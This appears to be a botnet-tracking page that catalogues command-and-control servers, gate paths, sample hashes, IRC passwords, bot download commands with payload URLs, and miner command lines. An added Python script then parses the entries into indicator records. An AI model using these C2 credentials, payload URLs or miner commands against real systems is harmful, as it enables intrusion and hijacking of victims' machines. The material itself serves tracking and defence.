Server: 158.255.2.59
Port: 6667
Current local users 436, max 2038
Channel: #network
#network 411
Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd
Hosting infos: http://whois.domaintools.com/158.255.2.59
srv1.su (Betabot http botnet hosted by softronics.ch)
Resolved srv1.su to 94.242.198.65
Server: srv1.su
Gate file: /b/order.php
Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using an http bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1 MB stub AutoIt crypter, but I guess he can only manage to
Read more...
92.243.77.139 (Pony loader hosted by infobox.ru)
Server: 92.243.77.139
Gate file: /Panel/gate.php
Related md5s (search on malwr.com to download the samples): 160419b4c5f8415b41fb23e99be12b19
Hosting infos: http://whois.domaintools.com/92.243.77.139
y.osej36.com (Irc botnet hosted by gandi.net)
Resolved y.osej36.com to 92.243.8.222
Server: y.osej36.com
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e
!NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e
!s -n
A modified ircd is used, so you may have trouble connecting.
Alternate domains: y.v23sdy.com y.rwt234.com
Mining info: minerd.exe -a scrypt -s 20 --no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x
(Note that -a scrypt selects scrypt hashing, i.e. Litecoin-style mining, not Bitcoin's SHA-256.)
Read more...
sisisu.su (Citadel banking malware hosted by he.net)
Resolved sisisu.su to 64.62.210.103
Server: sisisu.su
Config file: /wheelbarrow/file.php
Gate file: /wheelbarrow/prism.php
Currently being downloaded by this betabot. This is his second attempt at a Citadel net; the first one can be found here.
Hosting infos: http://whois.domaintools.com/64.62.210.103
Related md5s (search on malwr.com to download the samples):
Citadel: 5707e28e79f6b6d469874f8b87ecb3b9
Edit: The moron forgot to remove the
Read more...
localmw.org (Andromeda http botnet hosted by ovh.net)
Resolved localmw.org to 198.50.158.222
Server: localmw.org
Gate file: /gate.php
Hosting infos: http://whois.domaintools.com/198.50.158.222
Related md5s (search on malwr.com to download the samples): e5ded5eca6ff72dbf2d5f39f0b801181
insane.pirate-the.net (Athena http botnet hosted by free-h.org)
Resolved insane.pirate-the.net to 91.234.104.150
Server: insane.pirate-the.net
Gate file: /here/gate.php
Thanks to whoever uploaded this on malwr.
Hosting infos: http://whois.domaintools.com/91.234.104.150
Related md5s (search on malwr.com to download the samples):
Athena http: e0046f2d10c7c790cf07d258cdafe299
skyline2050.net (Andromeda http botnet hosted by infiumhost.com)
Resolved skyline2050.net to 188.190.127.160
Server: skyline2050.net
Gate file: /761994/gate.php
This is Andromeda 2.07, not the cracked 2.06. You can tell by the admin page being located at /adm.php rather than on the index page. The owner of the betabot is pushing this as an update and abandoning the betabot.
Mining infos: dum:dum@s5.6d6f6e65797072696e746572.com:3333 (the hex subdomain label decodes to "moneyprinter")
Hosting infos: http://whois.domaintools.com/188.190.127.160
Related md5s (search on malwr.com
Read more...
64.85.233.8 (Citadel banking malware hosted by home ip?)
Server: 64.85.233.8
Config file: /hide/1355/file.php
Gate file: /hide/1355/enter.php
According to whois, this is a home cable internet IP (United States, Concord, Astound Broadband).
Also on the server: Smoke Loader and Pony.
Smoke Server: 64.85.233.8
Gate file: /smokeldr/index.php
Pony Server: 64.85.233.8
Gate file: /js/gate.php
The moron running this has Pony downloading itself, creating a continuous
Read more...
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40
Server: synd1cat3.com
Gate file: /kJuN2p/gate.php
Hosting infos: http://whois.domaintools.com/192.95.33.40
Related md5s (search on malwr.com to download the samples):
Athena http: 88730b35c88269066e191695cf1e148d
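Entries on this page all follow the same loose field convention (Resolved/Server/Port/Gate file/Config file/Related md5s, plus IRC credentials, bot commands and mining lines where present), which makes them easy to turn into machine-readable indicators. The script below is an added example, not code from the tracker's author or from any of the bot authors: it parses two entries copied from the page (the y.osej36.com IRC bot and the skyline2050.net Andromeda 2.07 post) into a structured indicator record, refangs the hxxp:// URLs, pulls the URL-plus-MD5 pairs out of the !NAZEL download commands, and extracts mining pool endpoints from both the minerd command line and the user:pass@host:port form. One heuristic is mine rather than the page's: DNS labels made entirely of hex that decode to printable ASCII are decoded (the Andromeda pool's 6d6f6e65797072696e746572 label is "moneyprinter").

```python
"""Parse botnet-tracker entries (this page's format) into structured indicators.

Added example; not the tracker's own code. Sample entries are copied from the
page. The hex-label decoding is an analyst heuristic, not a page claim.
"""
import json
import re

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
HOST = r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
MD5 = r"\b[0-9a-f]{32}\b"
URL = r"h(?:tt|xx)ps?://\S+"          # accepts both live and defanged (hxxp) URLs

# Sample input: two entries copied from the page, flattened exactly as extracted.
IRC_ENTRY = (
    "Resolved y.osej36.com to 92.243.8.222 Server: y.osej36.com Port: 80 "
    "Server password: passwd Channel: #root Channel password: redem "
    "!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e "
    "!NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e "
    "!s -n A modified ircd is used, so you may have trouble connecting. "
    "Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info: "
    "minerd.exe -a scrypt -s 20 --no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x"
)
ANDROMEDA_ENTRY = (
    "Resolved skyline2050.net to 188.190.127.160 Server: skyline2050.net "
    "Gate file: /761994/gate.php This is andromeda 2.07, not the cracked 2.06. "
    "Mining infos: dum:dum@s5.6d6f6e65797072696e746572.com:3333 "
    "Hosting infos: http://whois.domaintools.com/188.190.127.160"
)


def refang(url):
    """Restore a usable scheme from the page's defanged hxxp:// form."""
    return re.sub(r"^hxxp", "http", url)


def decode_hex_labels(host):
    """Heuristic (mine, not the page's): decode DNS labels that are pure hex of printable ASCII."""
    found = {}
    for label in host.split("."):
        if len(label) >= 8 and len(label) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", label):
            raw = bytes.fromhex(label)
            if all(0x20 <= b < 0x7F for b in raw):
                found[label] = raw.decode("ascii")
    return found


def _uniq(items):
    seen = set()
    return [x for x in items if not (x in seen or seen.add(x))]


def parse_entry(text):
    # Drop the whois link so its IP is never mistaken for an indicator.
    text = re.sub(r"Hosting infos: \S+", "", text)
    hosts, ips = [], []
    for name, ip in re.findall(rf"Resolved ({HOST}) to ({IP})", text):
        hosts.append(name)
        ips.append(ip)
    for server in re.findall(r"Server: (\S+)", text):       # 'Server password:' does not match
        (ips if re.fullmatch(IP, server) else hosts).append(server)
    alt = re.search(rf"Alternate domains: ((?:{HOST}\s*)+)", text)
    if alt:
        hosts += alt.group(1).split()

    irc = {}
    for key, label in (("port", "Port"), ("server_password", "Server password"),
                       ("channel", "Channel"), ("channel_password", "Channel password")):
        m = re.search(rf"{label}: (\S+)", text)
        if m:
            irc[key] = int(m.group(1)) if key == "port" else m.group(1)

    # Bot commands of the form "!VERB <url> <md5>" (download-and-run with an integrity hash).
    commands = [{"verb": verb, "url": url, "refanged": refang(url), "md5": md5}
                for verb, url, md5 in re.findall(rf"(![A-Za-z]+) ({URL}) ({MD5})", text)]

    mining = []
    for pool, user in re.findall(rf"-o ({HOST}:\d+)(?: -u (\S+))?", text):    # minerd style
        mining.append({"pool": pool, "user": user or None, "password": None})
    for user, pw, host, port in re.findall(rf"(\S+?):(\S*?)@({HOST}):(\d+)", text):  # user:pass@host:port
        mining.append({"pool": f"{host}:{port}", "user": user, "password": pw})
    hosts = _uniq(hosts + [m["pool"].rsplit(":", 1)[0] for m in mining])

    decoded = {}
    for h in hosts:
        decoded.update(decode_hex_labels(h))
    return {
        "hosts": hosts,
        "ips": _uniq(ips),
        "paths": _uniq(re.findall(r"(?:Gate|Config) file: (\S+)", text)),
        "md5s": sorted(set(re.findall(MD5, text))),
        "irc": irc,
        "commands": commands,
        "mining": mining,
        "decoded_labels": decoded,
    }


if __name__ == "__main__":
    for entry in (IRC_ENTRY, ANDROMEDA_ENTRY):
        print(json.dumps(parse_entry(entry), indent=2))
```

The output keeps URLs defanged and adds a refanged copy beside each, so the record can be pasted into a blocklist without anyone accidentally clicking a live payload URL; the separate `irc` block (server password, channel, channel password) is what you would feed a network signature for this C2, since a modified ircd that rejects standard clients still has to accept those exact PASS and JOIN strings from its bots.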